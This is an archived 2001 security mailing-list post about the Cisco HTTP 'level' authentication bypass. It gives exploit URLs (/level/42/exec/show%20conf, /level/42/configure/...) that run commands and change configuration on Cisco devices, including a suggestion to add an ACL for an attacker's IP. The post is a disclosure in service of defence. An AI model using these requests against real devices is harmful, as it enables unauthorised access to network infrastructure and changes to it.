The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Cisco device HTTP exploit...


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Mon, 2 Jul 2001 13:56:37 -0700 (MST)
From: Half Adder <dps@Lib-Vai.lib.asu.edu.>
To: [email protected]
Subject: Cisco device HTTP exploit...

You can also run configuration commands. :)

http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.

Start with http://169.254.0.16/level/xx/configure  and go from there.

A malicious user could use:

http://169.254.0.15/level/42/exec/show%20conf

to get, for instance, vty 0 4 acl information and then add an ACL for
his/her source ip. 

I tested creating a banner.  I assume other configure commands will work
as well.  This was tested on a Cisco switch.  Anyone?

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру